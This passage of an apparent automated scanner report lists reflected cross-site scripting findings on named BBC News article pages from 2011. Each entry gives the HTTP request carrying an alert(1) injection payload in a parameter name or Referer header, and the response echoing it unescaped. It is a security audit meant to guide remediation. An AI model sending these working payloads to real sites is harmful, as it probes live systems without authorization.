User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:36 GMT
Keep-Alive: timeout=10, max=785
Expires: Sat, 12 Feb 2011 02:03:36 GMT
Connection: close
Set-Cookie: BBC-UID=543d65255eca9708dbdb3077416207980e855604603081fad4fbfa74c2bc94500Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:36 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=543d65255eca9708dbdb3077416207980e855604603081fad4fbfa74c2bc94500Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:36 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476216000,
       editionToServe: 'us',
       queryString: '52c19'-alert(1)-'2a417e9ef2e=1',
       referrer: null,
       section: 'middle-east',
       sectionPath: '/World/Middle East',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12437881',
       assetType:
...[SNIP]...

1.50. http://www.bbc.co.uk/news/world-middle-east-12437912 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-middle-east-12437912

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b489'-alert(1)-'c694ea9bbf5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-middle-east-12437912?4b489'-alert(1)-'c694ea9bbf5=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:35 GMT
Keep-Alive: timeout=10, max=717
Expires: Sat, 12 Feb 2011 02:03:35 GMT
Connection: close
Set-Cookie: BBC-UID=94ddc595ee9a47773a0e32f9e1e386b9efaa290f30c041691b7be3eee0ce249c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:35 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=94ddc595ee9a47773a0e32f9e1e386b9efaa290f30c041691b7be3eee0ce249c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:35 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61266

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476215000,
       editionToServe: 'us',
       queryString: '4b489'-alert(1)-'c694ea9bbf5=1',
       referrer: null,
       section: 'middle-east',
       sectionPath: '/World/Middle East',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12437912',
       assetType:
...[SNIP]...

1.51. http://www.bbc.co.uk/news/world-middle-east-12437922 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-middle-east-12437922

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45bc0'-alert(1)-'6946333a7ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-middle-east-12437922?45bc0'-alert(1)-'6946333a7ea=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:35 GMT
Keep-Alive: timeout=10, max=793
Expires: Sat, 12 Feb 2011 02:03:35 GMT
Connection: close
Set-Cookie: BBC-UID=74dd55a5fe2a37f74b7a6f7a6142fce8dcd262a20000c139cb2be3cf67148af80Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:35 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=74dd55a5fe2a37f74b7a6f7a6142fce8dcd262a20000c139cb2be3cf67148af80Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:35 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476215000,
       editionToServe: 'us',
       queryString: '45bc0'-alert(1)-'6946333a7ea=1',
       referrer: null,
       section: 'middle-east',
       sectionPath: '/World/Middle East',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12437922',
       assetType:
...[SNIP]...

1.52. http://www.bbc.co.uk/news/world-south-asia-12427513 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-south-asia-12427513

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 126a9'-alert(1)-'a4ab1c22469 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-south-asia-12427513?126a9'-alert(1)-'a4ab1c22469=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:36 GMT
Keep-Alive: timeout=10, max=799
Expires: Sat, 12 Feb 2011 02:03:36 GMT
Connection: close
Set-Cookie: BBC-UID=742dc5a59eca4778c9f10fc281954661e477250860b001595b1ba37fe8d4961c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:36 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=742dc5a59eca4778c9f10fc281954661e477250860b001595b1ba37fe8d4961c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:36 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58143

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476216000,
       editionToServe: 'us',
       queryString: '126a9'-alert(1)-'a4ab1c22469=1',
       referrer: null,
       section: 'south-asia',
       sectionPath: '/World/South Asia',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12427513',
       assetType: 's
...[SNIP]...

1.53. http://www.bbc.co.uk/news/world-south-asia-12427518 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-south-asia-12427518

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f4b5'-alert(1)-'62ff340d451 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-south-asia-12427518?3f4b5'-alert(1)-'62ff340d451=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:37 GMT
Keep-Alive: timeout=10, max=777
Expires: Sat, 12 Feb 2011 02:03:37 GMT
Connection: close
Set-Cookie: BBC-UID=144d15a51eda0729fac7011e914cc14b09d64a14a0c091a96beb223ab6cc84360Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:37 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=144d15a51eda0729fac7011e914cc14b09d64a14a0c091a96beb223ab6cc84360Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:37 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476217000,
       editionToServe: 'us',
       queryString: '3f4b5'-alert(1)-'62ff340d451=1',
       referrer: null,
       section: 'south-asia',
       sectionPath: '/World/South Asia',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12427518',
       assetType: 's
...[SNIP]...

1.54. http://www.bbc.co.uk/news/world-south-asia-12437087 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-south-asia-12437087

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d842'-alert(1)-'6a07d65281f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-south-asia-12437087?9d842'-alert(1)-'6a07d65281f=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:37 GMT
Keep-Alive: timeout=10, max=786
Expires: Sat, 12 Feb 2011 02:03:37 GMT
Connection: close
Set-Cookie: BBC-UID=747d15f55e9a17b929c61a2ea19f5ed220724ef93070917fc2b9104b878df11c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:37 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=747d15f55e9a17b929c61a2ea19f5ed220724ef93070917fc2b9104b878df11c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:37 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476217000,
       editionToServe: 'us',
       queryString: '9d842'-alert(1)-'6a07d65281f=1',
       referrer: null,
       section: 'south-asia',
       sectionPath: '/World/South Asia',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12437087',
       assetType: 's
...[SNIP]...

1.55. http://www.bbc.co.uk/news/world-us-canada-12411274 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-us-canada-12411274

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ee05'-alert(1)-'ae30755afbc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-us-canada-12411274?1ee05'-alert(1)-'ae30755afbc=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:38 GMT
Keep-Alive: timeout=10, max=799
Expires: Sat, 12 Feb 2011 02:03:38 GMT
Connection: close
Set-Cookie: BBC-UID=e45d7525ae7ab7ba390d9f2201360bcb3a8e889ab0c0418a84fb9aa442cc7b8a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:38 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=e45d7525ae7ab7ba390d9f2201360bcb3a8e889ab0c0418a84fb9aa442cc7b8a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:38 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476218000,
       editionToServe: 'us',
       queryString: '1ee05'-alert(1)-'ae30755afbc=1',
       referrer: null,
       section: 'us-and-canada',
       sectionPath: '/World/US and Canada',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12411274',
       assetTy
...[SNIP]...

1.56. http://www.bbc.co.uk/news/world-us-canada-12435117 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-us-canada-12435117

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48594'-alert(1)-'c193dc087b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-us-canada-12435117?48594'-alert(1)-'c193dc087b4=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:40 GMT
Keep-Alive: timeout=10, max=781
Expires: Sat, 12 Feb 2011 02:03:40 GMT
Connection: close
Set-Cookie: BBC-UID=14add5a5fe3ae72ceb490a1bc1562a84aa9e45cec0709233072d6324ac48e3b00Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:40 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=14add5a5fe3ae72ceb490a1bc1562a84aa9e45cec0709233072d6324ac48e3b00Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:40 GMT; path=/; domain=bbc.co.uk;
Content-Length: 57672

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476220000,
       editionToServe: 'us',
       queryString: '48594'-alert(1)-'c193dc087b4=1',
       referrer: null,
       section: 'us-and-canada',
       sectionPath: '/World/US and Canada',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12435117',
       assetTy
...[SNIP]...

1.57. http://www.bbc.co.uk/news/world-us-canada-12436383 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-us-canada-12436383

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2944'-alert(1)-'443e909350b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-us-canada-12436383?c2944'-alert(1)-'443e909350b=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:40 GMT
Keep-Alive: timeout=10, max=786
Expires: Sat, 12 Feb 2011 02:03:40 GMT
Connection: close
Set-Cookie: BBC-UID=345db5856e4a770c1b7845a0a1433d6ae51553a1f09081da642baad5b3c19a7a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:40 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=345db5856e4a770c1b7845a0a1433d6ae51553a1f09081da642baad5b3c19a7a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:40 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476220000,
       editionToServe: 'us',
       queryString: 'c2944'-alert(1)-'443e909350b=1',
       referrer: null,
       section: 'us-and-canada',
       sectionPath: '/World/US and Canada',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12436383',
       assetTy
...[SNIP]...

1.58. http://www.bbc.co.uk/news/world-us-canada-12437116 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-us-canada-12437116

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d53b'-alert(1)-'7475e3a5be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-us-canada-12437116?1d53b'-alert(1)-'7475e3a5be=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:42 GMT
Keep-Alive: timeout=10, max=752
Expires: Sat, 12 Feb 2011 02:03:42 GMT
Connection: close
Set-Cookie: BBC-UID=949d45e5de4ac7fe6a035c7001c10bf8bc2880a11000e139db8b938e085db3fa0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:42 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=949d45e5de4ac7fe6a035c7001c10bf8bc2880a11000e139db8b938e085db3fa0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:42 GMT; path=/; domain=bbc.co.uk;
Content-Length: 68931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476222000,
       editionToServe: 'us',
       queryString: '1d53b'-alert(1)-'7475e3a5be=1',
       referrer: null,
       section: 'us-and-canada',
       sectionPath: '/World/US and Canada',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12437116',
       assetTy
...[SNIP]...

1.59. http://www.bbc.co.uk/news/world-us-canada-12437121 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-us-canada-12437121

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18283'-alert(1)-'23017f3d16d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-us-canada-12437121?18283'-alert(1)-'23017f3d16d=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:41 GMT
Keep-Alive: timeout=10, max=787
Expires: Sat, 12 Feb 2011 02:03:41 GMT
Connection: close
Set-Cookie: BBC-UID=a43d0585ee4a373dff70ae6991e51a3a901196699070012a44ab4a75b1712afe0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:41 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=a43d0585ee4a373dff70ae6991e51a3a901196699070012a44ab4a75b1712afe0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:41 GMT; path=/; domain=bbc.co.uk;
Content-Length: 54951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476221000,
       editionToServe: 'us',
       queryString: '18283'-alert(1)-'23017f3d16d=1',
       referrer: null,
       section: 'us-and-canada',
       sectionPath: '/World/US and Canada',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12437121',
       assetTy
...[SNIP]...

1.60. http://www.bbc.co.uk/news/business-12434447 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business-12434447

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f15c'-alert(1)-'547b170e2e7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed for using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/business-12434447 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=7f15c'-alert(1)-'547b170e2e7

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:06 GMT
Keep-Alive: timeout=10, max=567
Expires: Sat, 12 Feb 2011 02:03:06 GMT
Connection: close
Set-Cookie: BBC-UID=e43da555befa35ea2b3ab63351c52ce3fdd6639a50a0d19a044b6a34009ce6f20Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:06 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=e43da555befa35ea2b3ab63351c52ce3fdd6639a50a0d19a044b6a34009ce6f20Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:06 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476186000,
       editionToServe: 'us',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=7f15c'-alert(1)-'547b170e2e7',
       section: 'business',
       sectionPath: '/Business',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12434447',
       assetType: 'story',
       uri: '/news/business-
...[SNIP]...

1.61. http://www.bbc.co.uk/news/business-12434453 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business-12434453

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae0f0'-alert(1)-'1e57d02e1e9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed for using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/business-12434453 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ae0f0'-alert(1)-'1e57d02e1e9

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:06 GMT
